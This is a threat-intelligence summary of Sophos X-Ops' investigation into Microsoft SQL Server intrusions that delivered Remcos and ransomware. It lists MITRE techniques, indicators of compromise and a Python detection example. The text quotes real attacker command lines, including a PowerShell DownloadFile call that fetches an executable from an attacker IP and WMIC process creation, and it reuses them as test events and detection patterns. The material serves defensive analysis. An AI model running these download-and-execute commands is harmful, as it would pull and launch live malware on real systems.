Sophos X-Ops describes a coordinated Observe-Orient-Decide-Act loop among SophosLabs, SecOps, MTR, and Sophos AI to study and disrupt a wave of Microsoft SQL Server attacks leveraging old RCE CVEs and delivering Remcos or various ransomware families including TargetCompany/Mallox and GlobeImposter/Alpha865qqz. The report emphasizes cross-team collaboration, rapid containment, and ongoing protection improvements to prevent repeat incidents in Asia and the Americas. #Mallox #TargetCompany #GlobeImposter #Alpha865qqz #Remcos #KMSAuto #SQLServer #CVE-2019-1068 #CVE-2020-0618 #SophosXOps
Keypoints
- The investigation notes an uptick in attacks against Microsoft SQL Server leveraging CVE-2019-1068 and CVE-2020-0618, with victims located primarily in Asia.
- Attacks deploy Remcos and multiple ransomware families, including TargetCompany/Mallox and GlobeImposter/Alpha865qqz, using externally exposed/unpatched SQL servers.
- Sophos MTR and Rapid Response coordinated to identify the threat's infrastructure, IoCs, and attack steps, with ongoing input from Sophos Labs and Sophos AI.
- Initial access was observed via SQL Server, with download-and-execute chains starting from PowerShell and .NET components reaching final payloads.
- Infection chains employ PowerShell downloaders, dotNet downloaders, and obfuscated/encrypted payloads, ultimately delivering ransomware or Remcos.
- Kill$ cleaner, 7zip SFX installers, AutoIt-based loaders, and other components show a diverse toolset used during the compromise, including attempts to disable defenses (IOBit Unlocker).
- Rapid Response helped prevent lateral movement and encryption on the customer, highlighting the value of cross-team collaboration and a strong security stack (including Intercept X).
MITRE Techniques
- [T1190] Exploit Public-Facing Application - Initial access via exploiting publicly accessible SQL Server vulnerabilities; “externally exposed and unpatched SQL servers.”
- [T1059.003] Windows Command Shell - Use of cmd.exe to execute commands that download and run payloads; “"C:\Windows\system32\cmd.exe" /c "echo $client = New-Object …"”
- [T1059.001] PowerShell - Use of PowerShell to download and execute update.ps1 and subsequent components; “$client.DownloadFile("http://91[.]243[.]44[.]142/arx-Ikrbwika.exe","C:\Users\MSSQL$~1\AppData\Local\Temp\VKDA55H6.exe")”
- [T1047] Windows Management Instrumentation - Execution via WMIC to create processes for payloads; “WMIC process call create …”
- [T1027] Obfuscated/Encrypted Files and Information - Final payload is obfuscated/encrypted and decoded by the downloader; “The final payload is in obfuscated or encrypted form, so the dotNet downloader has to decode it first.”
- [T1486] Data Encrypted for Impact - Ransomware encryption observed and mitigated by CryptoGuard; “Sophos CryptoGuard detected a ransomware attack and prevented encryption of essential files.”
- [T1562.001] Impair Defenses - Attempts to disable protections via IOBit Unlocker; “to disable antivirus and antimalware protections such as Intercept X.”
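To turn the chain above into something a detection engineer can test, here is an added example (not code from Sophos or the report) that classifies process-creation events against the listed techniques: a SQL Server process spawning a shell, PowerShell WebClient downloads, WMIC process creation, and payload staging under the SQL Server service account's Temp directory. The event fields, the benign control event and all command lines are constructed assumptions, not real telemetry.

```python
import re
from typing import Dict, List

# Constructed process-creation events modelled on the report's chain:
# sqlservr.exe -> cmd.exe -> PowerShell download -> WMIC execution.
# Event 4 is a benign control that should produce no hits.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "sqlservr.exe", "image": "cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c "echo $client = New-Object System.Net.WebClient > C:\Users\MSSQL$~1\AppData\Local\Temp\update.ps1"'},
    {"id": 2, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": r'powershell -ExecutionPolicy Bypass -File C:\Users\MSSQL$~1\AppData\Local\Temp\update.ps1'},
    {"id": 3, "parent": "powershell.exe", "image": "wmic.exe",
     "cmdline": r'WMIC process call create "C:\Users\MSSQL$~1\AppData\Local\Temp\VKDA55H6.exe"'},
    {"id": 4, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r'powershell Get-ChildItem C:\Users\alice\Documents'},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wmic.exe"}

# (MITRE technique id, pattern over the command line), checked in order.
CMDLINE_RULES = [
    ("T1059.001", re.compile(r"New-Object\s+(System\.)?Net\.WebClient|DownloadFile|DownloadString|-ExecutionPolicy\s+Bypass", re.I)),
    ("T1047", re.compile(r"\bwmic(\.exe)?\b.*process\s+call\s+create", re.I)),
]
# Files dropped into the SQL Server service account's Temp folder (8.3 short name tolerated).
STAGING_PATH = re.compile(r"\\MSSQL\$[^\\]*\\AppData\\Local\\Temp\\", re.I)


def classify(event: dict) -> List[str]:
    """Return the technique ids (and a staging tag) matched by one event."""
    hits: List[str] = []
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    # A database engine has no business spawning a command interpreter.
    if parent == "sqlservr.exe" and image in SHELLS:
        hits.append("T1190")
        if image == "cmd.exe":
            hits.append("T1059.003")
    for tid, pattern in CMDLINE_RULES:
        if pattern.search(cmd) and tid not in hits:
            hits.append(tid)
    if STAGING_PATH.search(cmd):
        hits.append("mssql-temp-staging")
    return hits


def detect(events) -> Dict[int, List[str]]:
    """Map event id -> matched techniques, keeping only events with at least one hit."""
    return {e["id"]: h for e in events if (h := classify(e))}
```

Feeding real Sysmon Event ID 1 or EDR process telemetry through `classify` only needs the three fields; the parent-process rule alone catches the initial hop before any payload is downloaded.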
Indicators of Compromise
- [IP] - C2/download servers and activity hosts - 91.243.44.42, 91.243.44.142, and 91.243.44.105
- [File Hash] - Example payloads observed in campaigns - 7d0687911ea9423310b7b83ebec9f52944ac022795c3b796aca5f0d2d15954b1, 8bb03cb1d5faf00b93612a10f24fb3afe025f59c0226a4b20b1a61fe06cd2077, 5d0e4ef9ee1f3a319faa45c572b5e7097865ddbda3840d138ae65a7d829cfddf
- [File Name] - Downloads and executables tied to the campaign - 9YFHR4SL.exe, C258SEE8.exe
- [URL] - Download and payload delivery URLs - http://91.243.44.105/Lvmsrqz_Phdvabki.jpg, http://91.243.44.142/arx-Ikrbwika.exe
- [Email] - Ransom note and contact addresses - [email protected], [email protected], [email protected]
Read more: https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/